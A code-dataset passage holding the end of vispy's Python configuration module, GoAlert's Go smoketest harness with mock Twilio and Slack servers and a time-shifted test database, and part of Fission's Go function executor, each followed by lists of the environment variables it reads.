# Adapted from pyzolib/paths.py:
# https://bitbucket.org/pyzo/pyzolib/src/tip/paths.py
def _get_vispy_app_dir():
"""Helper to get the default directory for storing vispy data"""
# Define default user directory
user_dir = os.path.expanduser('~')
# Get system app data dir
path = None
if sys.platform.startswith('win'):
path1, path2 = os.getenv('LOCALAPPDATA'), os.getenv('APPDATA')
path = path1 or path2
elif sys.platform.startswith('darwin'):
path = os.path.join(user_dir, 'Library', 'Application Support')
# On Linux and as fallback
if not (path and os.path.isdir(path)):
path = user_dir
# Maybe we should store things local to the executable (in case of a
# portable distro or a frozen application that wants to be portable)
prefix = sys.prefix
if getattr(sys, 'frozen', None): # See application_dir() function
prefix = os.path.abspath(os.path.dirname(sys.path[0]))
for reldir in ('settings', '../settings'):
localpath = os.path.abspath(os.path.join(prefix, reldir))
if os.path.isdir(localpath):
try:
open(os.path.join(localpath, 'test.write'), 'wb').close()
os.remove(os.path.join(localpath, 'test.write'))
except IOError:
pass # We cannot write in this directory
else:
path = localpath
break
# Get path specific for this app
appname = '.vispy' if path == user_dir else 'vispy'
path = os.path.join(path, appname)
return path
class ConfigEvent(Event):
""" Event indicating a configuration change.
This class has a 'changes' attribute which is a dict of all name:value
pairs that have changed in the configuration.
"""
def __init__(self, changes):
Event.__init__(self, type='config_change')
self.changes = changes
class Config(object):
""" Container for global settings used application-wide in vispy.
Events:
-------
Config.events.changed - Emits ConfigEvent whenever the configuration
changes.
"""
def __init__(self, **kwargs):
self.events = EmitterGroup(source=self)
self.events['changed'] = EventEmitter(
event_class=ConfigEvent,
source=self)
self._config = {}
self.update(**kwargs)
self._known_keys = get_config_keys()
def __getitem__(self, item):
return self._config[item]
def __setitem__(self, item, val):
self._check_key_val(item, val)
self._config[item] = val
# inform any listeners that a configuration option has changed
self.events.changed(changes={item: val})
def _check_key_val(self, key, val):
global _allowed_config_keys
# check values against acceptable ones
known_keys = _allowed_config_keys
if key not in known_keys:
raise KeyError('key "%s" not in known keys: "%s"'
% (key, known_keys))
if not isinstance(val, known_keys[key]):
raise TypeError('Value for key "%s" must be one of %s, not %s.'
% (key, known_keys[key], type(val)))
def update(self, **kwargs):
for key, val in kwargs.items():
self._check_key_val(key, val)
self._config.update(kwargs)
self.events.changed(changes=kwargs)
def __repr__(self):
return repr(self._config)
def get_config_keys():
"""The config keys known by vispy and their allowed data types.
Returns
-------
keys : dict
Dict of {key: (types,)} pairs.
"""
global _allowed_config_keys
return _allowed_config_keys.copy()
def _get_config_fname():
"""Helper for the vispy config file"""
directory = _get_vispy_app_dir()
if directory is None:
return None
fname = op.join(directory, 'vispy.json')
if os.environ.get('_VISPY_CONFIG_TESTING', None) is not None:
fname = op.join(_TempDir(), 'vispy.json')
return fname
def _load_config():
"""Helper to load prefs from ~/.vispy/vispy.json"""
fname = _get_config_fname()
if fname is None or not op.isfile(fname):
return dict()
with open(fname, 'r') as fid:
config = json.load(fid)
return config
def save_config(**kwargs):
"""Save configuration keys to vispy config file
Parameters
----------
**kwargs : keyword arguments
Key/value pairs to save to the config file.
"""
if kwargs == {}:
kwargs = config._config
current_config = _load_config()
current_config.update(**kwargs)
# write to disk
fname = _get_config_fname()
if fname is None:
raise RuntimeError('config filename could not be determined')
if not op.isdir(op.dirname(fname)):
os.mkdir(op.dirname(fname))
with open(fname, 'w') as fid:
json.dump(current_config, fid, sort_keys=True, indent=0)
def set_data_dir(directory=None, create=False, save=False):
"""Set vispy data download directory"""
if directory is None:
directory = _data_path
if _data_path is None:
raise IOError('default path cannot be determined, please '
'set it manually (directory != None)')
if not op.isdir(directory):
if not create:
raise IOError('directory "%s" does not exist, perhaps try '
'create=True to create it?' % directory)
os.mkdir(directory)
config.update(data_path=directory)
if save:
save_config(data_path=directory)
def _enable_profiling():
""" Start profiling and register callback to print stats when the program
exits.
"""
import cProfile
import atexit
global _profiler
_profiler = cProfile.Profile()
_profiler.enable()
atexit.register(_profile_atexit)
_profiler = None
def _profile_atexit():
global _profiler
_profiler.print_stats(sort='cumulative')
def sys_info(fname=None, overwrite=False):
"""Get relevant system and debugging information
Parameters
----------
fname : str | None
Filename to dump info to. Use None to simply print.
overwrite : bool
If True, overwrite file (if it exists).
Returns
-------
out : str
The system information as a string.
"""
if fname is not None and op.isfile(fname) and not overwrite:
raise IOError('file exists, use overwrite=True to overwrite')
out = ''
try:
# Nest all imports here to avoid any circular imports
from ..app import use_app, Canvas
from ..app.backends import BACKEND_NAMES
from ..gloo import gl
from ..testing import has_backend
# get default app
with use_log_level('warning'):
app = use_app(call_reuse=False) # suppress messages
out += 'Platform: %s\n' % platform.platform()
out += 'Python: %s\n' % str(sys.version).replace('\n', ' ')
out += 'Backend: %s\n' % app.backend_name
for backend in BACKEND_NAMES:
if backend.startswith('ipynb_'):
continue
with use_log_level('warning', print_msg=False):
which = has_backend(backend, out=['which'])[1]
out += '{0:<9} {1}\n'.format(backend + ':', which)
out += '\n'
# We need an OpenGL context to get GL info
canvas = Canvas('Test', (10, 10), show=False, app=app)
canvas._backend._vispy_set_current()
out += 'GL version: %r\n' % (gl.glGetParameter(gl.GL_VERSION),)
x_ = gl.GL_MAX_TEXTURE_SIZE
out += 'MAX_TEXTURE_SIZE: %r\n' % (gl.glGetParameter(x_),)
out += 'Extensions: %r\n' % (gl.glGetParameter(gl.GL_EXTENSIONS),)
canvas.close()
except Exception: # don't stop printing info
out += '\nInfo-gathering error:\n%s' % traceback.format_exc()
pass
if fname is not None:
with open(fname, 'w') as fid:
fid.write(out)
return out
class _TempDir(str):
"""Class for creating and auto-destroying temp dir
This is designed to be used with testing modules.
We cannot simply use __del__() method for cleanup here because the rmtree
function may be cleaned up before this object, so we use the atexit module
instead.
"""
def __new__(self):
new = str.__new__(self, tempfile.mkdtemp())
return new
def __init__(self):
self._path = self.__str__()
atexit.register(self.cleanup)
def cleanup(self):
rmtree(self._path, ignore_errors=True)
# initialize config options
_init()
|
[] |
[] |
[
"APPDATA",
"_VISPY_CONFIG_TESTING",
"LOCALAPPDATA"
] |
[]
|
["APPDATA", "_VISPY_CONFIG_TESTING", "LOCALAPPDATA"]
|
python
| 3 | 0 | |
smoketest/harness/harness.go
|
package harness
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"net/http/httptest"
"net/url"
"os"
"path/filepath"
"reflect"
"sort"
"strings"
"sync"
"testing"
"text/template"
"time"
"github.com/jackc/pgx/v4"
"github.com/jackc/pgx/v4/pgxpool"
"github.com/jackc/pgx/v4/stdlib"
"github.com/pkg/errors"
uuid "github.com/satori/go.uuid"
"github.com/target/goalert/alert"
"github.com/target/goalert/app"
"github.com/target/goalert/config"
"github.com/target/goalert/devtools/mockslack"
"github.com/target/goalert/devtools/mocktwilio"
"github.com/target/goalert/devtools/pgdump-lite"
"github.com/target/goalert/migrate"
"github.com/target/goalert/notification/twilio"
"github.com/target/goalert/permission"
"github.com/target/goalert/user"
"github.com/target/goalert/user/notificationrule"
"github.com/target/goalert/util/log"
"github.com/target/goalert/util/sqlutil"
)
const dbTimeFormat = "2006-01-02 15:04:05.999999-07:00"
var (
dbURLStr string
dbURL *url.URL
)
func init() {
dbURLStr = os.Getenv("DB_URL")
if dbURLStr == "" {
dbURLStr = "postgres://[email protected]:5432?sslmode=disable"
}
var err error
dbURL, err = url.Parse(dbURLStr)
if err != nil {
panic(err)
}
}
func DBURL(name string) string {
if name == "" {
return dbURLStr
}
u := *dbURL
u.Path = "/" + url.PathEscape(name)
return u.String()
}
// Harness is a helper for smoketests. It deals with assertions, database management, and backend monitoring during tests.
type Harness struct {
phoneCCG, uuidG *DataGen
t *testing.T
closing bool
tw *twilioAssertionAPI
twS *httptest.Server
cfg config.Config
slack *slackServer
slackS *httptest.Server
slackApp mockslack.AppInfo
slackUser mockslack.UserInfo
ignoreErrors []string
backend *app.App
backendLogs io.Closer
dbURL string
dbName string
delayOffset time.Duration
mx sync.Mutex
start time.Time
resumed time.Time
lastTimeChange time.Time
pgResume time.Time
db *pgxpool.Pool
userGeneratedIndex int
gqlSessions map[string]string
}
func (h *Harness) Config() config.Config {
return h.cfg
}
// NewHarness will create a new database, perform `migrateSteps` migrations, inject `initSQL` and return a new Harness bound to
// the result. It starts a backend process pre-configured to a mock twilio server for monitoring notifications as well.
func NewHarness(t *testing.T, initSQL, migrationName string) *Harness {
t.Helper()
h := NewStoppedHarness(t, initSQL, nil, migrationName)
h.Start()
return h
}
func NewHarnessWithData(t *testing.T, initSQL string, sqlData interface{}, migrationName string) *Harness {
t.Helper()
h := NewStoppedHarness(t, initSQL, sqlData, migrationName)
h.Start()
return h
}
// NewHarnessDebugDB works like NewHarness, but fails the test immediately after
// migrations have been run. It is used to debug data & queries from a smoketest.
//
// Note that the now() function will be locked to the init timestamp for inspection.
func NewHarnessDebugDB(t *testing.T, initSQL, migrationName string) *Harness {
t.Helper()
h := NewStoppedHarness(t, initSQL, nil, migrationName)
h.Migrate("")
t.Fatal("DEBUG DB ::", h.dbURL)
return nil
}
const (
twilioAuthToken = "11111111111111111111111111111111"
twilioAccountSID = "AC00000000000000000000000000000000"
mailgunAPIKey = "key-00000000000000000000000000000000"
)
// NewStoppedHarness will create a NewHarness, but will not call Start.
func NewStoppedHarness(t *testing.T, initSQL string, sqlData interface{}, migrationName string) *Harness {
t.Helper()
if testing.Short() {
t.Skip("skipping Harness tests for short mode")
}
t.Logf("Using DB URL: %s", dbURL)
start := time.Now()
name := strings.Replace("smoketest_"+time.Now().Format("2006_01_02_15_04_05")+uuid.NewV4().String(), "-", "", -1)
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
conn, err := pgx.Connect(ctx, DBURL(""))
if err != nil {
t.Fatal("connect to db:", err)
}
defer conn.Close(ctx)
_, err = conn.Exec(ctx, "create database "+sqlutil.QuoteID(name))
if err != nil {
t.Fatal("create db:", err)
}
conn.Close(ctx)
t.Logf("created test database '%s': %s", name, dbURL)
twCfg := mocktwilio.Config{
AuthToken: twilioAuthToken,
AccountSID: twilioAccountSID,
MinQueueTime: 100 * time.Millisecond, // until we have a stateless backend for answering calls
}
h := &Harness{
uuidG: NewDataGen(t, "UUID", DataGenFunc(GenUUID)),
phoneCCG: NewDataGen(t, "Phone", DataGenArgFunc(GenPhoneCC)),
dbName: name,
dbURL: DBURL(name),
lastTimeChange: start,
start: start,
gqlSessions: make(map[string]string),
t: t,
}
h.tw = newTwilioAssertionAPI(func() {
h.FastForward(time.Minute)
h.Trigger()
}, func(num string) string {
id, ok := h.phoneCCG.names[num]
if !ok {
return num
}
return fmt.Sprintf("%s/Phone(%s)", num, id)
}, mocktwilio.NewServer(twCfg), h.phoneCCG.Get("twilio"))
h.twS = httptest.NewServer(h.tw)
// freeze DB time until backend starts
h.execQuery(`
create schema testing_overrides;
alter database `+sqlutil.QuoteID(name)+` set search_path = "$user", public,testing_overrides, pg_catalog;
create or replace function testing_overrides.now()
returns timestamp with time zone
as $$
begin
return '`+start.Format(dbTimeFormat)+`';
end;
$$ language plpgsql;
`, nil)
h.Migrate(migrationName)
h.initSlack()
h.execQuery(initSQL, sqlData)
return h
}
func (h *Harness) Start() {
h.t.Helper()
var cfg config.Config
cfg.General.DisableV1GraphQL = true
cfg.Slack.Enable = true
cfg.Slack.AccessToken = h.slackApp.AccessToken
cfg.Slack.ClientID = h.slackApp.ClientID
cfg.Slack.ClientSecret = h.slackApp.ClientSecret
cfg.Twilio.Enable = true
cfg.Twilio.AccountSID = twilioAccountSID
cfg.Twilio.AuthToken = twilioAuthToken
cfg.Twilio.FromNumber = h.phoneCCG.Get("twilio")
cfg.Mailgun.Enable = true
cfg.Mailgun.APIKey = mailgunAPIKey
cfg.Mailgun.EmailDomain = "smoketest.example.com"
h.cfg = cfg
_, err := migrate.ApplyAll(context.Background(), h.dbURL)
if err != nil {
h.t.Fatalf("failed to migrate backend: %v\n", err)
}
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
poolCfg, err := pgxpool.ParseConfig(h.dbURL)
if err != nil {
h.t.Fatalf("failed to parse db url: %v", err)
}
poolCfg.MaxConns = 2
h.db, err = pgxpool.ConnectConfig(ctx, poolCfg)
if err != nil {
h.t.Fatalf("failed to connect to db: %v", err)
}
// resume the flow of time
err = h.db.QueryRow(ctx, `select pg_catalog.now()`).Scan(&h.pgResume)
if err != nil {
h.t.Fatalf("failed to get postgres timestamp: %v", err)
}
h.resumed = time.Now()
h.lastTimeChange = time.Now().Add(100 * time.Millisecond)
h.modifyDBOffset(0)
appCfg := app.Defaults()
appCfg.ListenAddr = "localhost:0"
appCfg.Verbose = true
appCfg.JSON = true
appCfg.DBURL = h.dbURL
appCfg.TwilioBaseURL = h.twS.URL
appCfg.DBMaxOpen = 5
appCfg.SlackBaseURL = h.slackS.URL
appCfg.InitialConfig = &h.cfg
r, w := io.Pipe()
h.backendLogs = w
log.EnableJSON()
log.SetOutput(w)
go h.watchBackendLogs(r)
dbCfg, err := pgx.ParseConfig(h.dbURL)
if err != nil {
h.t.Fatalf("failed to parse db url: %v", err)
}
h.backend, err = app.NewApp(appCfg, stdlib.OpenDB(*dbCfg))
if err != nil {
h.t.Fatalf("failed to start backend: %v", err)
}
h.TwilioNumber("") // register default number
go h.backend.Run(context.Background())
err = h.backend.WaitForStartup(ctx)
if err != nil {
h.t.Fatalf("failed to start backend: %v", err)
}
}
// URL returns the backend server's URL
func (h *Harness) URL() string {
return h.backend.URL()
}
// Migrate will perform `steps` number of migrations.
func (h *Harness) Migrate(migrationName string) {
h.t.Helper()
h.t.Logf("Running migrations (target: %s)", migrationName)
_, err := migrate.Up(context.Background(), h.dbURL, migrationName)
if err != nil {
h.t.Fatalf("failed to run migration: %v", err)
}
}
// IgnoreErrorsWith will cause the Harness to ignore backend errors containing the specified substring.
func (h *Harness) IgnoreErrorsWith(substr string) {
h.mx.Lock()
defer h.mx.Unlock()
h.ignoreErrors = append(h.ignoreErrors, substr)
}
func (h *Harness) modifyDBOffset(d time.Duration) {
n := time.Now()
d -= n.Sub(h.lastTimeChange)
if n.After(h.lastTimeChange) {
h.lastTimeChange = n
}
h.delayOffset += d
h.setDBOffset(h.delayOffset)
}
func (h *Harness) setDBOffset(d time.Duration) {
h.mx.Lock()
defer h.mx.Unlock()
elapsed := time.Since(h.resumed)
h.t.Logf("Updating DB time offset to: %s (+ %s elapsed = %s since test start)", h.delayOffset.String(), elapsed.String(), (h.delayOffset + elapsed).String())
h.execQuery(fmt.Sprintf(`
create or replace function testing_overrides.now()
returns timestamp with time zone
as $$
begin
return cast('%s' as timestamp with time zone) + (pg_catalog.now() - cast('%s' as timestamp with time zone))::interval;
end;
$$ language plpgsql;
`,
h.start.Add(d).Format(dbTimeFormat),
h.pgResume.Format(dbTimeFormat),
), nil)
}
func (h *Harness) FastForward(d time.Duration) {
h.t.Helper()
h.t.Logf("Fast-forward %s", d.String())
h.delayOffset += d
h.setDBOffset(h.delayOffset)
}
func (h *Harness) execQuery(sql string, data interface{}) {
h.t.Helper()
t := template.New("sql")
t.Funcs(template.FuncMap{
"uuid": func(id string) string { return fmt.Sprintf("'%s'", h.uuidG.Get(id)) },
"phone": func(id string) string { return fmt.Sprintf("'%s'", h.phoneCCG.Get(id)) },
"phoneCC": func(cc, id string) string { return fmt.Sprintf("'%s'", h.phoneCCG.GetWithArg(cc, id)) },
"slackChannelID": func(name string) string { return fmt.Sprintf("'%s'", h.Slack().Channel(name).ID()) },
})
_, err := t.Parse(sql)
if err != nil {
h.t.Fatalf("failed to parse query template: %v", err)
}
b := new(bytes.Buffer)
err = t.Execute(b, data)
if err != nil {
h.t.Fatalf("failed to render query template: %v", err)
}
err = ExecSQLBatch(context.Background(), h.dbURL, b.String())
if err != nil {
h.t.Fatalf("failed to exec query: %v", err)
}
}
// CreateAlert will create one or more unacknowledged alerts for a service.
func (h *Harness) CreateAlert(serviceID string, summary ...string) {
h.t.Helper()
permission.SudoContext(context.Background(), func(ctx context.Context) {
h.t.Helper()
tx, err := h.backend.DB().BeginTx(ctx, nil)
if err != nil {
h.t.Fatalf("failed to start tx: %v", err)
}
defer tx.Rollback()
for _, sum := range summary {
a := &alert.Alert{
ServiceID: serviceID,
Summary: sum,
}
h.t.Logf("insert alert: %v", a)
_, isNew, err := h.backend.AlertStore.CreateOrUpdateTx(ctx, tx, a)
if err != nil {
h.t.Fatalf("failed to insert alert: %v", err)
}
if !isNew {
h.t.Fatal("could not create duplicate alert with summary: " + sum)
}
}
err = tx.Commit()
if err != nil {
h.t.Fatalf("failed to commit tx: %v", err)
}
})
}
// CreateManyAlert will create multiple new unacknowledged alerts for a given service.
func (h *Harness) CreateManyAlert(serviceID, summary string) {
h.t.Helper()
a := &alert.Alert{
ServiceID: serviceID,
Summary: summary,
}
h.t.Logf("insert alert: %v", a)
permission.SudoContext(context.Background(), func(ctx context.Context) {
h.t.Helper()
_, err := h.backend.AlertStore.Create(ctx, a)
if err != nil {
h.t.Fatalf("failed to insert alert: %v", err)
}
})
}
// AddNotificationRule will add a notification rule to the database.
func (h *Harness) AddNotificationRule(userID, cmID string, delayMinutes int) {
h.t.Helper()
nr := ¬ificationrule.NotificationRule{
DelayMinutes: delayMinutes,
UserID: userID,
ContactMethodID: cmID,
}
h.t.Logf("insert notification rule: %v", nr)
permission.SudoContext(context.Background(), func(ctx context.Context) {
h.t.Helper()
_, err := h.backend.NotificationRuleStore.Insert(ctx, nr)
if err != nil {
h.t.Fatalf("failed to insert notification rule: %v", err)
}
})
}
// Trigger will trigger, and wait for, an engine cycle.
func (h *Harness) Trigger() {
h.backend.Engine.TriggerAndWaitNextCycle(context.Background())
}
// Escalate will escalate an alert in the database, when 'level' matches.
func (h *Harness) Escalate(alertID, level int) {
h.t.Helper()
h.t.Logf("escalate alert #%d (from level %d)", alertID, level)
permission.SudoContext(context.Background(), func(ctx context.Context) {
err := h.backend.AlertStore.Escalate(ctx, alertID, level)
if err != nil {
h.t.Fatalf("failed to escalate alert: %v", err)
}
})
}
// Phone will return the generated phone number for the id provided.
func (h *Harness) Phone(id string) string { return h.phoneCCG.Get(id) }
// PhoneCC will return the generated phone number for the id provided.
func (h *Harness) PhoneCC(cc, id string) string { return h.phoneCCG.GetWithArg(cc, id) }
// UUID will return the generated UUID for the id provided.
func (h *Harness) UUID(id string) string { return h.uuidG.Get(id) }
func (h *Harness) isClosing() bool {
h.mx.Lock()
defer h.mx.Unlock()
return h.closing
}
func (h *Harness) dumpDB() {
testName := reflect.ValueOf(h.t).Elem().FieldByName("name").String()
file := filepath.Join("smoketest_db_dump", testName+".sql")
file, err := filepath.Abs(file)
if err != nil {
h.t.Fatalf("failed to get abs dump path: %v", err)
}
os.MkdirAll(filepath.Dir(file), 0755)
var t time.Time
err = h.db.QueryRow(context.Background(), "select now()").Scan(&t)
if err != nil {
h.t.Fatalf("failed to get current timestamp: %v", err)
}
conn, err := h.db.Acquire(context.Background())
if err != nil {
h.t.Fatalf("failed to get db connection: %v", err)
}
defer conn.Release()
fd, err := os.Create(file)
if err != nil {
h.t.Fatalf("failed to open dump file: %v", err)
}
defer fd.Close()
err = pgdump.DumpData(context.Background(), conn.Conn(), fd)
if err != nil {
h.t.Errorf("failed to dump database '%s': %v", h.dbName, err)
}
_, err = fmt.Fprintf(fd, "\n-- Last Timestamp: %s\n", t.Format(time.RFC3339Nano))
if err != nil {
h.t.Fatalf("failed to open DB dump: %v", err)
}
}
// Close terminates any background processes, and drops the testing database.
// It should be called at the end of all tests (usually with `defer h.Close()`).
func (h *Harness) Close() error {
h.t.Helper()
if recErr := recover(); recErr != nil {
defer panic(recErr)
}
h.tw.WaitAndAssert(h.t)
h.slack.WaitAndAssert()
h.mx.Lock()
h.closing = true
h.mx.Unlock()
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
err := h.backend.Shutdown(ctx)
if err != nil {
h.t.Error("failed to shutdown backend cleanly:", err)
}
h.backendLogs.Close()
h.slackS.Close()
h.twS.Close()
h.tw.Close()
h.dumpDB()
h.db.Close()
conn, err := pgx.Connect(ctx, DBURL(""))
if err != nil {
h.t.Error("failed to connect to DB:", err)
}
defer conn.Close(ctx)
_, err = conn.Exec(ctx, "drop database "+sqlutil.QuoteID(h.dbName))
if err != nil {
h.t.Errorf("failed to drop database '%s': %v", h.dbName, err)
}
return nil
}
// SetCarrierName will set the carrier name for the given phone number.
func (h *Harness) SetCarrierName(number, name string) {
h.tw.Server.SetCarrierInfo(number, twilio.CarrierInfo{Name: name})
}
// TwilioNumber will return a registered (or register if missing) Twilio number for the given ID.
// The default FromNumber will always be the empty ID.
func (h *Harness) TwilioNumber(id string) string {
num := h.phoneCCG.Get("twilio" + id)
err := h.tw.RegisterSMSCallback(num, h.URL()+"/v1/twilio/sms/messages")
if err != nil {
h.t.Fatalf("failed to init twilio (SMS callback): %v", err)
}
err = h.tw.RegisterVoiceCallback(num, h.URL()+"/v1/twilio/voice/call")
if err != nil {
h.t.Fatalf("failed to init twilio (voice callback): %v", err)
}
return num
}
// CreateUser generates a random user.
func (h *Harness) CreateUser() (u *user.User) {
h.t.Helper()
var err error
permission.SudoContext(context.Background(), func(ctx context.Context) {
u, err = h.backend.UserStore.Insert(ctx, &user.User{
Name: fmt.Sprintf("Generated%d", h.userGeneratedIndex),
ID: uuid.NewV4().String(),
Role: permission.RoleUser,
Email: fmt.Sprintf("generated%[email protected]", h.userGeneratedIndex),
})
})
if err != nil {
h.t.Fatal(errors.Wrap(err, "generate random user"))
}
h.userGeneratedIndex++
return u
}
// WaitAndAssertOnCallUsers will ensure the correct set of users as on-call for the given serviceID.
func (h *Harness) WaitAndAssertOnCallUsers(serviceID string, userIDs ...string) {
h.t.Helper()
doQL := func(query string, res interface{}) {
g := h.GraphQLQuery2(query)
for _, err := range g.Errors {
h.t.Error("GraphQL Error:", err.Message)
}
if len(g.Errors) > 0 {
h.t.Fatal("errors returned from GraphQL")
}
if res == nil {
return
}
err := json.Unmarshal(g.Data, &res)
if err != nil {
h.t.Fatal("failed to parse response:", err)
}
}
getUsers := func() []string {
var result struct {
Service struct {
OnCallUsers []struct {
UserID string
UserName string
}
}
}
doQL(fmt.Sprintf(`
query{
service(id: "%s"){
onCallUsers{
userID
userName
}
}
}
`, serviceID), &result)
var ids []string
for _, oc := range result.Service.OnCallUsers {
ids = append(ids, oc.UserID)
}
if len(ids) == 0 {
return nil
}
sort.Strings(ids)
uniq := ids[:1]
last := ids[0]
for _, id := range ids[1:] {
if id == last {
continue
}
uniq = append(uniq, id)
last = id
}
return uniq
}
sort.Strings(userIDs)
match := func(final bool) bool {
ids := getUsers()
if len(ids) != len(userIDs) {
if final {
h.t.Fatalf("got %d on-call users; want %d", len(ids), len(userIDs))
}
return false
}
for i, id := range userIDs {
if ids[i] != id {
if final {
h.t.Fatalf("on-call[%d] = %s; want %s", i, ids[i], id)
}
return false
}
}
return true
}
h.Trigger() // run engine cycle
match(true) // assert result
}
|
[
"\"DB_URL\""
] |
[] |
[
"DB_URL"
] |
[]
|
["DB_URL"]
|
go
| 1 | 0 | |
pkg/executor/executor.go
|
/*
Copyright 2016 The Fission Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package executor
import (
"context"
"fmt"
"github.com/dgraph-io/ristretto"
"net/http"
"os"
"strconv"
"strings"
"sync"
"time"
"github.com/dchest/uniuri"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus/promhttp"
"go.uber.org/zap"
fv1 "github.com/fission/fission/pkg/apis/core/v1"
"github.com/fission/fission/pkg/crd"
"github.com/fission/fission/pkg/executor/cms"
"github.com/fission/fission/pkg/executor/executortype"
"github.com/fission/fission/pkg/executor/executortype/newdeploy"
"github.com/fission/fission/pkg/executor/executortype/poolmgr"
"github.com/fission/fission/pkg/executor/fscache"
"github.com/fission/fission/pkg/executor/reaper"
"github.com/fission/fission/pkg/executor/util"
fetcherConfig "github.com/fission/fission/pkg/fetcher/config"
)
type (
// Executor defines a fission function executor.
Executor struct {
logger *zap.Logger
executorTypes map[fv1.ExecutorType]executortype.ExecutorType
cms *cms.ConfigSecretController
fissionClient *crd.FissionClient
requestChan chan *createFuncServiceRequest
fsCreateWg map[string]*sync.WaitGroup
fnCache *ristretto.Cache
}
createFuncServiceRequest struct {
function *fv1.Function
respChan chan *createFuncServiceResponse
}
createFuncServiceResponse struct {
funcSvc *fscache.FuncSvc
err error
}
)
// MakeExecutor returns an Executor for given ExecutorType(s).
func MakeExecutor(logger *zap.Logger, cms *cms.ConfigSecretController,
fissionClient *crd.FissionClient, types map[fv1.ExecutorType]executortype.ExecutorType) (*Executor, error) {
fnCache, err := ristretto.NewCache(&ristretto.Config{
NumCounters: 1000000,
MaxCost: 1,
BufferItems: 64,
})
if err != nil {
return nil, err
}
executor := &Executor{
logger: logger.Named("executor"),
cms: cms,
fissionClient: fissionClient,
executorTypes: types,
requestChan: make(chan *createFuncServiceRequest),
fsCreateWg: make(map[string]*sync.WaitGroup),
fnCache: fnCache,
}
for _, et := range types {
go func(et executortype.ExecutorType) {
et.Run(context.Background())
}(et)
}
go cms.Run(context.Background())
go executor.serveCreateFuncServices()
return executor, nil
}
// All non-cached function service requests go through this goroutine
// serially. It parallelizes requests for different functions, and
// ensures that for a given function, only one request causes a pod to
// get specialized. In other words, it ensures that when there's an
// ongoing request for a certain function, all other requests wait for
// that request to complete.
func (executor *Executor) serveCreateFuncServices() {
for {
req := <-executor.requestChan
fnMetadata := &req.function.ObjectMeta
if req.function.Spec.InvokeStrategy.ExecutionStrategy.ExecutorType == fv1.ExecutorTypePoolmgr {
go func() {
buffer := 10 // add some buffer time for specialization
specializationTimeout := req.function.Spec.InvokeStrategy.ExecutionStrategy.SpecializationTimeout
// set minimum specialization timeout to avoid illegal input and
// compatibility problem when applying old spec file that doesn't
// have specialization timeout field.
if specializationTimeout < fv1.DefaultSpecializationTimeOut {
specializationTimeout = fv1.DefaultSpecializationTimeOut
}
fnSpecializationTimeoutContext, cancel := context.WithTimeout(context.Background(),
time.Duration(specializationTimeout+buffer)*time.Second)
defer cancel()
fsvc, err := executor.createServiceForFunction(fnSpecializationTimeoutContext, req.function)
req.respChan <- &createFuncServiceResponse{
funcSvc: fsvc,
err: err,
}
}()
continue
}
// Cache miss -- is this first one to request the func?
wg, found := executor.fsCreateWg[crd.CacheKey(fnMetadata)]
if !found {
// create a waitgroup for other requests for
// the same function to wait on
wg := &sync.WaitGroup{}
wg.Add(1)
executor.fsCreateWg[crd.CacheKey(fnMetadata)] = wg
// launch a goroutine for each request, to parallelize
// the specialization of different functions
go func() {
// Control overall specialization time by setting function
// specialization time to context. The reason not to use
// context from router requests is because a request maybe
// canceled for unknown reasons and let executor keeps
// spawning pods that never finish specialization process.
// Also, even a request failed, a specialized function pod
// still can serve other subsequent requests.
buffer := 10 // add some buffer time for specialization
specializationTimeout := req.function.Spec.InvokeStrategy.ExecutionStrategy.SpecializationTimeout
// set minimum specialization timeout to avoid illegal input and
// compatibility problem when applying old spec file that doesn't
// have specialization timeout field.
if specializationTimeout < fv1.DefaultSpecializationTimeOut {
specializationTimeout = fv1.DefaultSpecializationTimeOut
}
fnSpecializationTimeoutContext, cancel := context.WithTimeout(context.Background(),
time.Duration(specializationTimeout+buffer)*time.Second)
defer cancel()
fsvc, err := executor.createServiceForFunction(fnSpecializationTimeoutContext, req.function)
req.respChan <- &createFuncServiceResponse{
funcSvc: fsvc,
err: err,
}
delete(executor.fsCreateWg, crd.CacheKey(fnMetadata))
wg.Done()
}()
} else {
// There's an existing request for this function, wait for it to finish
go func() {
executor.logger.Debug("waiting for concurrent request for the same function",
zap.Any("function", fnMetadata))
wg.Wait()
// get the function service from the cache
fsvc, err := executor.getFunctionServiceFromCache(req.function)
// fsCache return error when the entry does not exist/expire.
// It normally happened if there are multiple requests are
// waiting for the same function and executor failed to cre-
// ate service for function.
err = errors.Wrapf(err, "error getting service for function %v in namespace %v", fnMetadata.Name, fnMetadata.Namespace)
req.respChan <- &createFuncServiceResponse{
funcSvc: fsvc,
err: err,
}
}()
}
}
}
func (executor *Executor) createServiceForFunction(ctx context.Context, fn *fv1.Function) (*fscache.FuncSvc, error) {
executor.logger.Debug("no cached function service found, creating one",
zap.String("function_name", fn.ObjectMeta.Name),
zap.String("function_namespace", fn.ObjectMeta.Namespace))
t := fn.Spec.InvokeStrategy.ExecutionStrategy.ExecutorType
e, ok := executor.executorTypes[t]
if !ok {
return nil, errors.Errorf("Unknown executor type '%v'", t)
}
fsvc, fsvcErr := e.GetFuncSvc(ctx, fn)
if fsvcErr != nil {
e := "error creating service for function"
executor.logger.Error(e,
zap.Error(fsvcErr),
zap.String("function_name", fn.ObjectMeta.Name),
zap.String("function_namespace", fn.ObjectMeta.Namespace))
fsvcErr = errors.Wrap(fsvcErr, fmt.Sprintf("[%s] %s", fn.ObjectMeta.Name, e))
}
return fsvc, fsvcErr
}
func (executor *Executor) getFunctionServiceFromCache(fn *fv1.Function) (*fscache.FuncSvc, error) {
t := fn.Spec.InvokeStrategy.ExecutionStrategy.ExecutorType
e, ok := executor.executorTypes[t]
if !ok {
return nil, errors.Errorf("Unknown executor type '%v'", t)
}
return e.GetFuncSvcFromCache(fn)
}
func serveMetric(logger *zap.Logger) {
// Expose the registered metrics via HTTP.
metricAddr := ":8080"
http.Handle("/metrics", promhttp.Handler())
err := http.ListenAndServe(metricAddr, nil)
logger.Fatal("done listening on metrics endpoint", zap.Error(err))
}
